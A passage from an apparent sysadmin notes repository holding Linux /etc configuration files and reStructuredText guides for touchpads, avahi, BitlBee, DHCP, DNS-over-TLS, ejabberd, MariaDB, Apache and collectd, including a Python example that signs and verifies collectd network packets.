    Option "XkbVariant" "oss"
    Option "XkbOptions" "terminate:ctrl_alt_bksp"
EndSection
--------------------------------------------------------------------------------
/etc-desktop/X11/xorg.conf.d/50-synaptics.conf:
--------------------------------------------------------------------------------
# Example xorg.conf.d snippet that assigns the touchpad driver
# to all touchpads. See xorg.conf.d(5) for more information on
# InputClass.
# DO NOT EDIT THIS FILE, your distribution will likely overwrite
# it when updating. Copy (and rename) this file into
# /etc/X11/xorg.conf.d first.
# Additional options may be added in the form of
#   Option "OptionName" "value"
#
# This file has been modified to set up Circular Scrolling with Touchpad:
# https://wiki.archlinux.org/index.php/Touchpad_Synaptics#Circular_Scrolling
Section "InputClass"
    Identifier "touchpad catchall"
    Driver "synaptics"
    MatchIsTouchpad "on"
    Option "TapButton1" "1"
    Option "TapButton2" "2"
    Option "TapButton3" "3"

    Option "CircularScrolling" "1"

    # This option is recommended on all Linux systems using evdev, but cannot be
    # enabled by default. See the following link for details:
    # http://who-t.blogspot.com/2010/11/how-to-ignore-configuration-errors.html
    MatchDevicePath "/dev/input/event*"
EndSection

Section "InputClass"
    Identifier "touchpad ignore duplicates"
    MatchIsTouchpad "on"
    MatchOS "Linux"
    MatchDevicePath "/dev/input/mouse*"
    Option "Ignore" "on"
EndSection

# This option enables the bottom right corner to be a right button on
# non-synaptics clickpads.
# This option is only interpreted by clickpads.
Section "InputClass"
    Identifier "Default clickpad buttons"
    MatchDriver "synaptics"
    Option "SoftButtonAreas" "50% 0 82% 0 0 0 0 0"
    # To disable the bottom edge area so the buttons only work as buttons,
    # not for movement, set the AreaBottomEdge
    # Option "AreaBottomEdge" "82%"
EndSection

# This option disables software buttons on Apple touchpads.
# This option is only interpreted by clickpads.
Section "InputClass"
    Identifier "Disable clickpad buttons on Apple touchpads"
    MatchProduct "Apple|bcm5974"
    MatchDriver "synaptics"
    Option "SoftButtonAreas" "0 0 0 0 0 0 0 0"
EndSection
--------------------------------------------------------------------------------
/etc-desktop/avahi/avahi-daemon.conf:
--------------------------------------------------------------------------------
# This file is part of avahi.
#
# avahi is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# avahi is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with avahi; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA.

# See avahi-daemon.conf(5) for more information on this configuration
# file!

[server]
#host-name=foo
#domain-name=local
#browse-domains=0pointer.de, zeroconf.org
use-ipv4=yes
use-ipv6=yes
#allow-interfaces=eth0
#deny-interfaces=eth1
#check-response-ttl=no
#use-iff-running=no
#enable-dbus=yes
#disallow-other-stacks=no
#allow-point-to-point=no
#cache-entries-max=4096
#clients-max=4096
#objects-per-client-max=1024
#entries-per-entry-group-max=32
ratelimit-interval-usec=1000000
ratelimit-burst=1000

[wide-area]
enable-wide-area=yes

[publish]
# Default configuration, for a server:
#disable-publishing=no
#disable-user-service-publishing=no
#add-service-cookie=no
#publish-addresses=yes
#publish-hinfo=yes
#publish-workstation=yes
#publish-domain=yes
#publish-dns-servers=192.168.50.1, 192.168.50.2
#publish-resolv-conf-dns-servers=yes
#publish-aaaa-on-ipv4=yes
#publish-a-on-ipv6=no

# To hide a workstation, add this line:
disable-publishing=yes

[reflector]
#enable-reflector=no
#reflect-ipv=no

[rlimits]
#rlimit-as=
rlimit-core=0
rlimit-data=4194304
rlimit-fsize=0
rlimit-nofile=768
rlimit-stack=4194304
rlimit-nproc=3
--------------------------------------------------------------------------------
/etc-desktop/index.rst:
--------------------------------------------------------------------------------
``/etc`` for Desktop
====================

.. toctree::
   :maxdepth: 1
   :glob:

   **
--------------------------------------------------------------------------------
/etc-server/bitlbee/bitlbee.conf:
--------------------------------------------------------------------------------
[settings]
## RunMode:
##
##   Inetd -- Run from inetd (default)
##   Daemon -- Run as a stand-alone daemon, serving all users from one process.
##     This saves memory if there are more users, the downside is that when one
##     user hits a crash-bug, all other users will also lose their connection.
##   ForkDaemon -- Run as a stand-alone daemon, but keep all clients in separate
##     child processes. This should be pretty safe and reliable to use instead
##     of inetd mode.
##
# RunMode = Inetd
RunMode = ForkDaemon

## DaemonPort/DaemonInterface:
##
## For daemon mode, you can specify on what interface and port the daemon
## should be listening for connections.
##
## DEBIAN NOTE: The init script passes the -p flag to use the port number
## set using debconf, this overrides the DaemonPort setting here.
##
# DaemonInterface = 0.0.0.0
# DaemonPort = 6667
DaemonInterface = 127.0.0.1
--------------------------------------------------------------------------------
/etc-server/bitlbee/bitlbee.conf.rst:
--------------------------------------------------------------------------------
``etc-server/bitlbee/``: BitlBee IRC gateway
===============================================

BitlBee (https://www.bitlbee.org/) is an IRC gateway to other chat networks.
Once installed, it is advisable to restrict BitlBee to listen only on the loopback interface.
Modify ``/etc/bitlbee/bitlbee.conf``:

.. literalinclude:: bitlbee.conf
   :language: ini

Then, start the BitlBee daemon and connect to the IRC gateway, for example with WeeChat::

    # Configure the server and connect to it
    /server add bitlbee localhost/6667 -autoconnect
    /connect bitlbee

    # Register the account in BitlBee control channel
    register

    # In WeeChat, save the password
    /secure set bitlbee_password
    /set irc.server.bitlbee.command "/msg &bitlbee identify ${sec.data.bitlbee_password}"

Then, in the BitlBee control channel (``&bitlbee``), add a Twitter account for example (https://wiki.bitlbee.org/HowtoTwitter)::

    account add twitter

    # Force using commands in order to post a new tweet
    account twitter set commands strict

    # Disable streams (cf. https://wiki.bitlbee.org/HowtoTwitter/StreamDeprecation)
    account twitter set stream off

    # Connect to Twitter
    account twitter on

    # Follow another Twitter account
    add twitter
--------------------------------------------------------------------------------
/etc-server/dhcp/dhcpd.conf:
--------------------------------------------------------------------------------
#
# Sample configuration file for ISC dhcpd for Debian
# Debian package: isc-dhcp-server
# Firewall rules: allow UDP incoming traffic from 68 to 67 on interface eth0:
#   iptables -I INPUT -i eth0 -p udp --sport 68 --dport 67 -j ACCEPT
#   iptables -I OUTPUT -o eth0 -p udp --sport 67 --dport 68 -j ACCEPT
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "example.org";
option domain-name-servers 192.168.1.1, 208.67.222.222;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.152.187.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.254.239.0 netmask 255.255.255.224 {
#  range 10.254.239.10 10.254.239.20;
#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}

# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.

#subnet 10.254.239.32 netmask 255.255.255.224 {
#  range dynamic-bootp 10.254.239.40 10.254.239.60;
#  option broadcast-address 10.254.239.31;
#  option routers rtr-239-32-1.example.org;
#}

# A slightly different configuration for an internal subnet.
#subnet 10.5.5.0 netmask 255.255.255.224 {
#  range 10.5.5.26 10.5.5.30;
#  option domain-name-servers ns1.internal.example.org;
#  option domain-name "internal.example.org";
#  option routers 10.5.5.1;
#  option broadcast-address 10.5.5.31;
#  default-lease-time 600;
#  max-lease-time 7200;
#}

# Hosts which require special configuration options can be listed in
# host statements. If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.

#host passacaglia {
#  hardware ethernet 0:0:c0:5d:bd:95;
#  filename "vmunix.passacaglia";
#  server-name "toccata.fugue.com";
#}

# Fixed IP addresses can also be specified for hosts. These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP. Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
#  hardware ethernet 08:00:07:26:c0:a5;
#  fixed-address fantasia.fugue.com;
#}

# You can declare a class of clients and then do address allocation
# based on that. The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.

#class "foo" {
#  match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}

#shared-network 224-29 {
#  subnet 10.17.224.0 netmask 255.255.255.0 {
#    option routers rtr-224.example.org;
#  }
#  subnet 10.0.29.0 netmask 255.255.255.0 {
#    option routers rtr-29.example.org;
#  }
#  pool {
#    allow members of "foo";
#    range 10.17.224.10 10.17.224.250;
#  }
#  pool {
#    deny members of "foo";
#    range 10.0.29.10 10.0.29.230;
#  }
#}

# These options are used to add static routes
option rfc3442-classless-static-routes code 121 = array of integer 8;
option ms-classless-static-routes code 249 = array of integer 8;

# Publish a static route to 192.168.1.0/24 via 10.13.37.1
subnet 10.13.37.0 netmask 255.255.255.0 {
  range 10.13.37.100 10.13.37.200;
  option routers 10.13.37.1;
  option rfc3442-classless-static-routes 24, 192, 168, 1, 10, 13, 37, 1;
  option ms-classless-static-routes 24, 192, 168, 1, 10, 13, 37, 1;
}
--------------------------------------------------------------------------------
/etc-server/dhcp/dnsmasq.conf:
--------------------------------------------------------------------------------
# Configuration file for dnsmasq.
#
# Format is one option per line, legal options are the same
# as the long options legal on the command line. See
# "/usr/sbin/dnsmasq --help" or "man 8 dnsmasq" for details.

# Listen on this specific port instead of the standard DNS port
# (53). Setting this to zero completely disables DNS function,
# leaving only DHCP and/or TFTP.
#port=5353
port=0

# If you want dnsmasq to listen for DHCP and DNS requests only on
# specified interfaces (and the loopback) give the name of the
# interface (eg eth0) here.
# Repeat the line for more than one interface.
interface=eth0
# Or you can specify which interface _not_ to listen on
#except-interface=
# Or which to listen on by address (remember to include 127.0.0.1 if
# you use this.)
#listen-address=
# If you want dnsmasq to provide only DNS service on an interface,
# configure it as shown above, and then use the following line to
# disable DHCP and TFTP on it.
#no-dhcp-interface=

# On systems which support it, dnsmasq binds the wildcard address,
# even when it is listening on only some interfaces. It then discards
# requests that it shouldn't reply to. This has the advantage of
# working even when interfaces come and go and change address. If you
# want dnsmasq to really bind only the interfaces it is listening on,
# uncomment this option. About the only time you may need this is when
# running another nameserver on the same machine.
#bind-interfaces

# If you don't want dnsmasq to read /etc/hosts, uncomment the
# following line.
#no-hosts
# or if you want it to read another file, as well as /etc/hosts, use
# this.
#addn-hosts=/etc/banner_add_hosts

# Set this (and domain: see below) if you want to have a domain
# automatically added to simple names in a hosts-file.
#expand-hosts

# Set the domain for dnsmasq. This is optional, but if it is set, it
# does the following things.
# 1) Allows DHCP hosts to have fully qualified domain names, as long
#    as the domain part matches this setting.
# 2) Sets the "domain" DHCP option thereby potentially setting the
#    domain of all systems configured by DHCP
# 3) Provides the domain part for "expand-hosts"
#domain=thekelleys.org.uk

# Set a different domain for a particular subnet
#domain=wireless.thekelleys.org.uk,192.168.2.0/24

# Same idea, but range rather than subnet
#domain=reserved.thekelleys.org.uk,192.68.3.100,192.168.3.200

# Uncomment this to enable the integrated DHCP server, you need
# to supply the range of addresses available for lease and optionally
# a lease time. If you have more than one network, you will need to
# repeat this for each network on which you want to supply DHCP
# service.
dhcp-range=10.13.37.100,10.13.37.200,12h

# For debugging purposes, log each DNS query as it passes through
# dnsmasq.
#log-queries

# Log lots of extra information about DHCP transactions.
#log-dhcp
--------------------------------------------------------------------------------
/etc-server/dhcp/dnsmasq.conf.rst:
--------------------------------------------------------------------------------
``etc-server/dhcp/dnsmasq.conf`` and doc
========================================

The full example configuration file for dnsmasq can be downloaded at:
http://thekelleys.org.uk/gitweb/?p=dnsmasq.git;a=blob;f=dnsmasq.conf.example

The following command spawns a DHCP server on interface ``eth0`` which gives IP
addresses in the range 10.13.37.100..10.13.37.200 and tells its clients to use
192.168.1.1 as primary DNS server::

    dnsmasq -kd -i eth0 --dhcp-range=10.13.37.100,10.13.37.200 --dhcp-option=6,192.168.1.1

By the way, here are iptables commands to open the UDP ports for a DHCP and DNS server::

    iptables -I INPUT -i eth0 -p udp --sport 68 --dport 67 -j ACCEPT
    iptables -I OUTPUT -o eth0 -p udp --sport 67 --dport 68 -j ACCEPT
    iptables -I INPUT -i eth0 -p udp --dport 53 -j ACCEPT
    iptables -I OUTPUT -o eth0 -p udp --sport 53 -j ACCEPT

Here is ``/etc/dnsmasq.conf`` for a DHCP server (no IPv6, no DNS):
(:download:`Download file`)

.. literalinclude:: dnsmasq.conf
   :language: sh
--------------------------------------------------------------------------------
/etc-server/dns/unbound-with-stubby.conf:
--------------------------------------------------------------------------------
# Configuration for using the stubby DNS-over-TLS implementation with Unbound
# Unbound listens on port 53 (DNS) while Stubby listens on port 8053
# cf. https://dnsprivacy.org/wiki/display/DP/DNS+Privacy+Clients#DNSPrivacyClients-Unbound/Stubbycombination

# /etc/unbound/unbound.conf.d/forward-to-stubby.conf
server:
    do-not-query-localhost: no
forward-zone:
    name: "."
    forward-addr: 127.0.0.1@8053
    forward-addr: ::1@8053

# /etc/stubby/stubby.yml
resolution_type: GETDNS_RESOLUTION_STUB
dns_transport_list:
  - GETDNS_TRANSPORT_TLS
tls_authentication: GETDNS_AUTHENTICATION_REQUIRED
tls_query_padding_blocksize: 128
edns_client_subnet_private : 1
round_robin_upstreams: 1
idle_timeout: 10000
listen_addresses:
  - 127.0.0.1@8053
  - 0::1@8053
upstream_recursive_servers:
  - address_data: 9.9.9.9
    tls_auth_name: "dns.quad9.net"
  - address_data: 1.1.1.1
    tls_auth_name: "cloudflare-dns.com"
  - address_data: 1.0.0.1
    tls_auth_name: "cloudflare-dns.com"
--------------------------------------------------------------------------------
/etc-server/dns/unbound.conf:
--------------------------------------------------------------------------------
# This file summarizes several Unbound configuration files in one file, for
# clarity.

# /etc/unbound/unbound.conf
# On Debian this file only contains one non-commented line:
include: "/etc/unbound/unbound.conf.d/*.conf"

# /etc/unbound/unbound.conf.d/root-auto-trust-anchor-file.conf
server:
    # The following line will configure unbound to perform cryptographic
    # DNSSEC validation using the root trust anchor.
    auto-trust-anchor-file: "/var/lib/unbound/root.key"

# /etc/unbound/unbound.conf.d/localhost.conf
# Allow access from localhost
server:
    interface: 127.0.0.1
    interface: ::1
    access-control: 127.0.0.0/8 allow
    access-control: ::1/128 allow

# /etc/unbound/unbound.conf.d/vpn.conf
# Allow access from VPN clients in 10.0.0.0/24 network
server:
    interface: 10.0.0.1
    access-control: 10.0.0.0/24 allow
--------------------------------------------------------------------------------
/etc-server/index.rst:
--------------------------------------------------------------------------------
``/etc`` for Server
===================

.. toctree::
   :maxdepth: 1
   :glob:

   **
--------------------------------------------------------------------------------
/etc-server/jabber/ejabberd.rst:
--------------------------------------------------------------------------------
ejabberd configuration
======================

Here is how ejabberd can be installed and configured on a Debian system.

First install the package::

    apt-get install ejabberd

``debconf`` asks for several things:

- a domain name, like ``example.com``
- an account to administrate the server, let's call it ``admin``

Then, the configuration file (``/etc/ejabberd/ejabberd.cfg``) looks like::

    %% Options which are set by Debconf and managed by ucf

    %% Admin user
    {acl, admin, {user, "admin", "example.com"}}.

    %% Hostname
    {hosts, ["example.com"]}.

By default, ejabberd listens on 3 TCP ports::

    {listen,
     [
      {5222, ejabberd_c2s, [
                            {access, c2s},
                            {shaper, c2s_shaper},
                            {max_stanza_size, 65536},
                            %%zlib,
                            starttls, {certfile, "/etc/ejabberd/ejabberd.pem"}
                           ]},
      {5269, ejabberd_s2s_in, [
                               {shaper, s2s_shaper},
                               {max_stanza_size, 131072}
                              ]},
      {5280, ejabberd_http, [
                             %%{request_handlers,
                             %% [
                             %%  {["pub", "archive"], mod_http_fileserver}
                             %% ]},
                             %%captcha,
                             http_bind,
                             http_poll,
                             web_admin
                            ]}
     ]}.
    {s2s_use_starttls, true}.
    {s2s_certfile, "/etc/ejabberd/ejabberd.pem"}.

This enables web administration on an HTTP server running on port 5280. Use a
URL such as http://example.com:5280/admin/ to access the administration interface.
Note that this is not secure (no HTTPS), so you may want to set up a front end to
access this server (reverse proxy, VPN, firewall, ...).

To add a new user, you just need to run::

    ejabberdctl register mynewuser example.com 'UserPassword'


DNS configuration
-----------------
Here is how a DNS zone may be configured::

    ;service.proto.name             class rr  pri weight port target
    _jabber._tcp.example.com.       IN    SRV 10  0      5269 jabber.example.com.
    _xmpp-server._tcp.example.com.  IN    SRV 10  0      5269 jabber.example.com.
    _xmpp-client._tcp.example.com.  IN    SRV 10  0      5222 jabber.example.com.

    jabber                          IN    A   10.22.33.44


Bitlbee configuration
---------------------
Bitlbee can be used to interact with jabber through an IRC server.
Here are some useful commands from http://wiki.bitlbee.org/quickstart::

    account add jabber bitlbee@example.com UserPassword
    account jabber on

In ``account list``, this new account is associated with an ID (like 0). Once
you know this ID, you may run::

    add 0 myuser@example.com


Source
------
http://wiki.linuxwall.info/doku.php/en:ressources:articles:ejabberd
--------------------------------------------------------------------------------
/etc-server/mysql/my.cnf:
--------------------------------------------------------------------------------
# Example MariaDB config file for medium systems.
#
# This is for a system with little memory (32M - 64M) where MariaDB plays
# an important part, or systems up to 128M where MariaDB is used together with
# other programs (such as a web server)
#
# MariaDB programs look for option files in a set of
# locations which depend on the deployment platform.
# You can copy this option file to one of those
# locations. For information about these locations, do:
# 'my_print_defaults --help' and see what is printed under
# Default options are read from the following files in the given order:
# More information at: http://dev.mysql.com/doc/mysql/en/option-files.html
#
# In this file, you can use all long options that a program supports.
# If you want to know which options a program supports, run the program
# with the "--help" option.

# The following options will be passed to all MariaDB clients
[client]
#password	= your_password
port		= 3306
socket		= /run/mysqld/mysqld.sock

# Here follows entries for some specific programs

# The MariaDB server
[mysqld]
port		= 3306
socket		= /run/mysqld/mysqld.sock
skip-external-locking
key_buffer_size = 16M
max_allowed_packet = 16M
table_open_cache = 64
sort_buffer_size = 512K
net_buffer_length = 8K
read_buffer_size = 256K
read_rnd_buffer_size = 512K
myisam_sort_buffer_size = 8M

# Point the following paths to different dedicated disks
#tmpdir		= /tmp/

# Don't listen on a TCP/IP port at all. This can be a security enhancement,
# if all processes that need to connect to mysqld run on the same host.
# All interaction with mysqld must be made via Unix sockets or named pipes.
# Note that using this option without enabling named pipes on Windows
# (via the "enable-named-pipe" option) will render mysqld useless!
#
skip-networking

# Replication Master Server (default)
# binary logging is required for replication
log-bin=mysql-bin

# binary logging format - mixed recommended
binlog_format=mixed

# required unique id between 1 and 2^32 - 1
# defaults to 1 if master-host is not set
# but will not function as a master if omitted
server-id	= 1

# Replication Slave (comment out master section to use this)
#
# To configure this host as a replication slave, you can choose between
# two methods :
#
# 1) Use the CHANGE MASTER TO command (fully described in our manual) -
#    the syntax is:
#
#    CHANGE MASTER TO MASTER_HOST=, MASTER_PORT=,
#    MASTER_USER=, MASTER_PASSWORD= ;
#
#    where you replace , , by quoted strings and
#    by the master's port number (3306 by default).
#
#    Example:
#
#    CHANGE MASTER TO MASTER_HOST='125.564.12.1', MASTER_PORT=3306,
#    MASTER_USER='joe', MASTER_PASSWORD='secret';
#
# OR
#
# 2) Set the variables below. However, in case you choose this method, then
#    start replication for the first time (even unsuccessfully, for example
#    if you mistyped the password in master-password and the slave fails to
#    connect), the slave will create a master.info file, and any later
#    change in this file to the variables' values below will be ignored and
#    overridden by the content of the master.info file, unless you shutdown
#    the slave server, delete master.info and restart the slave server.
#    For that reason, you may want to leave the lines below untouched
#    (commented) and instead use CHANGE MASTER TO (see above)
#
# required unique id between 2 and 2^32 - 1
# (and different from the master)
# defaults to 2 if master-host is set
# but will not function as a slave if omitted
#server-id       = 2
#
# The replication master for this slave - required
#master-host     =
#
# The username the slave will use for authentication when connecting
# to the master - required
#master-user     =
#
# The password the slave will authenticate with when connecting to
# the master - required
#master-password =
#
# The port the master is listening on.
# optional - defaults to 3306
#master-port     =
#
# binary logging - not required for slaves, but recommended
#log-bin=mysql-bin

# Uncomment the following if you are using InnoDB tables
#innodb_data_home_dir = /var/lib/mysql
#innodb_data_file_path = ibdata1:10M:autoextend
#innodb_log_group_home_dir = /var/lib/mysql
# You can set .._buffer_pool_size up to 50 - 80 %
# of RAM but beware of setting memory usage too high
#innodb_buffer_pool_size = 16M
#innodb_additional_mem_pool_size = 2M
# Set .._log_file_size to 25 % of buffer pool size
#innodb_log_file_size = 5M
#innodb_log_buffer_size = 8M
#innodb_flush_log_at_trx_commit = 1
#innodb_lock_wait_timeout = 50

[mysqldump]
quick
max_allowed_packet = 16M

[mysql]
no-auto-rehash
# Remove the next comment character if you are not familiar with SQL
#safe-updates

[myisamchk]
key_buffer_size = 20M
sort_buffer_size = 20M
read_buffer = 2M
write_buffer = 2M

[mysqlhotcopy]
interactive-timeout
--------------------------------------------------------------------------------
/etc-server/web/apache.conf:
--------------------------------------------------------------------------------
# This file contains some customizations from the default Apache configuration.
# The main config file can be located in:
# * /etc/httpd/conf/httpd.conf (ArchLinux)
# * /etc/apache2/apache2.conf (Debian)
#
# Documentation:
# * http://httpd.apache.org/docs/current/
# * https://wiki.archlinux.org/index.php/LAMP

ServerSignature Off
ServerTokens Prod

# Configuration for a local web server
ServerName localhost
Listen 127.0.0.1:80
Listen [::1]:80

    AllowOverride None

    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
    # Apache <2.3 configuration:
    #
    #   Order allow,deny
    #   Allow from all
    #

    DirectoryIndex index.html

Alias "/doc" "/usr/share/doc/"

    Options Indexes MultiViews FollowSymLinks
    AllowOverride None

    # "Require local" is better than:
    #   Require ip 127.0.0.0/8 ::1/128
    #   Require host localhost
    Require local

    # Apache <2.4 configuration:
    #Order deny,allow
    #Deny from all
    #Allow from 127.0.0.0/255.0.0.0 ::1/128

    # Disable PHP in this directory
        php_admin_value engine Off
        # If PHP is enabled, this directive restricts fopen
        php_admin_value open_basedir "/usr/share/doc/"

--------------------------------------------------------------------------------
/etc-server/web/collectd.rst:
--------------------------------------------------------------------------------
Collectd
========

Collectd is a daemon to collect system statistics in RRD (Round-Robin Database)
files. It is basically a backend daemon, and several front-ends exist to navigate through the data.

* Web site: https://collectd.org/
* Plugins: https://collectd.org/wiki/index.php/Table_of_Plugins
* Front-ends: https://collectd.org/wiki/index.php/List_of_front-ends


Installation
------------

Collectd is packaged for some Linux distributions.
In Debian, this command
installs collectd with the default configuration::

    apt-get install collectd

The configuration is done in ``/etc/collectd/collectd.conf``. It is quite
straightforward and the wiki helps understanding the few tricky fields
(https://collectd.org/wiki/index.php/Table_of_Plugins).

Here is a basic configuration::

    LoadPlugin syslog

        LogLevel info

    LoadPlugin cpu
    LoadPlugin df
    LoadPlugin disk
    LoadPlugin interface
    #LoadPlugin irq
    LoadPlugin load
    LoadPlugin memory
    LoadPlugin rrdtool
    #LoadPlugin sensors
    LoadPlugin swap

        Device "rootfs"
        # MountPoint "/home"
        FSType "cgroup"
        FSType "devtmpfs"
        FSType "tmpfs"
        FSType "overlay"
        FSType "squashfs"
        IgnoreSelected true
        ReportByDevice false
        ReportReserved true
        ReportInodes true

        # Don't collect statistics about loopback interface
        Interface "lo"
        IgnoreSelected true

        DataDir "/var/lib/collectd/rrd/"


Network setup
-------------

To centralise collected data on a server, you need to use the network plugin
(https://collectd.org/wiki/index.php/Plugin:Network). If your collectd daemon
is recent enough, you may use authenticated and encrypted communication channels
using a password.
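What ``SecurityLevel Sign`` actually buys you is integrity and origin authentication of each UDP packet, not confidentiality. The following example (added here, not code from this page or from collectd) builds and verifies a packet carrying the signature part as I understand it from collectd's binary-protocol documentation (part type ``0x0200``, a 32-byte HMAC-SHA-256 keyed with the user's password, computed over the user name and every following part); treat that framing as an assumption to check against your collectd version. The user ``user``, the password ``secret`` and the host part ``client1`` are constructed sample values matching the ``AuthFile`` format shown below.

```python
import hashlib
import hmac
import struct

# collectd binary protocol part types (assumed from the protocol documentation).
TYPE_HOST = 0x0000          # string part carrying the host name
TYPE_SIGN_SHA256 = 0x0200   # signature part, produced by "SecurityLevel Sign"
SIGN_PART_FIXED = 4 + 32    # 4-byte part header + 32-byte HMAC-SHA-256 digest


def string_part(part_type, value):
    """Encode a string part: big-endian type, total length, string, NUL."""
    data = value.encode("utf-8") + b"\x00"
    return struct.pack("!HH", part_type, 4 + len(data)) + data


def parse_authfile(text):
    """Parse an AuthFile in the 'user: secret' format, ignoring comments."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, password = line.partition(":")
        if sep:
            users[user.strip()] = password.strip()
    return users


def sign_packet(username, password, parts):
    """Prepend a signature part; the HMAC covers the user name and all following parts."""
    user_bytes = username.encode("utf-8")
    signed_region = user_bytes + parts
    digest = hmac.new(password.encode("utf-8"), signed_region, hashlib.sha256).digest()
    header = struct.pack("!HH", TYPE_SIGN_SHA256, SIGN_PART_FIXED + len(user_bytes))
    return header + digest + signed_region


def verify_packet(packet, users):
    """Return (username, remaining parts) when the signature is valid, else None.

    A receiver configured with SecurityLevel Sign must drop unsigned packets,
    packets from unknown users and packets whose HMAC does not match; a wrong
    or tampered packet never reaches the RRD files.
    """
    if len(packet) < SIGN_PART_FIXED:
        return None
    part_type, part_len = struct.unpack("!HH", packet[:4])
    if part_type != TYPE_SIGN_SHA256 or part_len < SIGN_PART_FIXED or part_len > len(packet):
        return None
    received_digest = packet[4:SIGN_PART_FIXED]
    username = packet[SIGN_PART_FIXED:part_len].decode("utf-8", errors="replace")
    password = users.get(username)
    if password is None:
        return None
    expected = hmac.new(password.encode("utf-8"), packet[SIGN_PART_FIXED:], hashlib.sha256).digest()
    if not hmac.compare_digest(received_digest, expected):
        return None
    return username, packet[part_len:]


# Constructed sample AuthFile content, in the "user: secret" format used by the server.
SAMPLE_AUTHFILE = "# collectd network plugin users\nuser: secret\n"


def demo():
    """Round trip: a signed packet verifies; tampered, re-keyed or unknown-user packets do not."""
    users = parse_authfile(SAMPLE_AUTHFILE)
    payload = string_part(TYPE_HOST, "client1")
    packet = sign_packet("user", "secret", payload)
    tampered = packet[:-1] + bytes([packet[-1] ^ 0x01])  # flip one bit of the payload
    return {
        "valid": verify_packet(packet, users) == ("user", payload),
        "tampered_rejected": verify_packet(tampered, users) is None,
        "wrong_password_rejected": verify_packet(packet, {"user": "other"}) is None,
        "unknown_user_rejected": verify_packet(packet, {}) is None,
    }


if __name__ == "__main__":
    print(demo())
```

Because the password is the HMAC key, the ``AuthFile`` must be readable only by the collectd user, and ``SecurityLevel Encrypt`` is still needed if the metrics themselves must not be readable on the wire.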

On the server, the configuration looks like this in ``collectd.conf``::

    <Plugin network>
        # Server IP and UDP port to listen to (the address below is a
        # placeholder to replace; 25826 is collectd's default port)
        <Listen "192.0.2.1" "25826">
            # "Sign" accepts signed and encrypted packets and refuses
            # unauthenticated ones; "Encrypt" would also refuse merely signed ones
            SecurityLevel Sign
            # This file contains for each user with password "secret":
            # user: secret
            AuthFile "/etc/collectd/passwd"
            Interface "eth0"
        </Listen>
        MaxPacketSize 1024
    </Plugin>

On each client, ``collectd.conf`` may contain::

    <Plugin network>
        # Server IP and UDP port (same placeholder as above)
        <Server "192.0.2.1" "25826">
            SecurityLevel Encrypt
            Username "user"
            Password "secret"
            Interface "eth0"
        </Server>
        TimeToLive "128"
    </Plugin>


Collection3 front-end
---------------------

The collectd package often provides front-end examples, among which is
Collection3. This front-end is a web front-end written as a CGI script in Perl.
By default it will look for RRD files in ``/var/lib/collectd/rrd`` but this
can be changed by editing ``etc/collection.conf`` which contains by default::

    DataDir "/var/lib/collectd/rrd"

Collection3 needs some Perl modules:

* ``Config::General``
* ``Regexp::Common``
* ``HTML::Entities``
* ``RRDs``

On a Debian server, this command installs the needed modules::

    apt-get install lib{config-general,regexp-common,html-parser,rrds}-perl

Apache virtual host configuration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
::

    <VirtualHost *:80>
        Alias /collection3/ /usr/share/doc/collectd-core/examples/collection3/
        ScriptAlias /collection3/bin/ /usr/share/doc/collectd-core/examples/collection3/bin/
        <Directory /usr/share/doc/collectd-core/examples/collection3/>
            AddHandler cgi-script .cgi
            DirectoryIndex bin/index.cgi
            Options +ExecCGI
            Require all granted
            # Apache <2.4 configuration:
            #Order Allow,Deny
            #Allow from all
        </Directory>
    </VirtualHost>


Nginx server configuration
~~~~~~~~~~~~~~~~~~~~~~~~~~
::

    server {
        listen 80 default_server;
        location /collection3 {
            alias /usr/share/doc/collectd-core/examples/collection3;
            location ~ ^/collection3/bin/.+\.cgi$ {
                include fastcgi_params;
                fastcgi_pass unix:/var/run/fcgiwrap.socket;
            }
            location /collection3/share {
                try_files $uri $uri/ =404;
            }
            location /collection3 {
                return 301 /collection3/bin/index.cgi;
            }
        }
    }

Lighttpd server configuration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
::

    # Note: if the config already enables mod_alias, you must remove it from
    # the next line
    server.modules += ( "mod_alias", "mod_cgi" )
    alias.url += ( "/collection3" => "/usr/share/doc/collectd-core/examples/collection3/" )
    $HTTP["url"] =~ "^/collection3" {
        cgi.assign = ( ".cgi" => "/usr/bin/perl" )
    }
    index-file.names += ( "bin/index.cgi" )


Collectd Graph Panel front-end
------------------------------

CGP (Collectd Graph Panel) is a better front-end than Collection3. It is
written in PHP. To install it, you just need to download the latest release from
https://github.com/pommi/CGP/releases in a folder and to configure your web
server accordingly.

Official website: http://pommi.nethuis.nl/category/cgp/

To enable ``jsrrdgraph`` (to have Javascript-rendered graphs in which you can
navigate with your mouse), you just need to enable the ``canvas`` mode. This
